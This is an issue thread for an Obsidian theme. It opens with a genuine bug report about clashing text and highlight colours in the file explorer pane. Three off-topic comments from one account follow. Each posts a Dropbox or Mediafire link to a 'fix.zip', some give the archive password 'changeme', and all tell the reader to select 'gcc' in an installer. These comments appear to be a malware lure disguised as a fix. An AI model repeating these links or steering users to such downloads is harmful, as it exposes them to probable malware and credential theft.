### ISSUE TITLE
File explorer pane - text/text highlight color issues

### ISSUE THREAD

**Issue by Eridyne** [Seniblue/Underwater#6]
Obsidian version: 1.6.7
Theme version: 1.4.81

In the file explorer pane, on selecting a file, the text highlight appears to be using the same theme color as the text. Both change when setting the "Foam" color via Style Settings. This applies regardless of light/dark mode.

Related, in the file explorer pane, when attempting to click-and-drag a file, the highlight color is different, but is not a good match for the text color. It either makes the text unreadable, or the combination is not very nice. This applies to every predefined light and dark theme save "Underwater Octopus" - where it's instead somewhat hard to read.

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
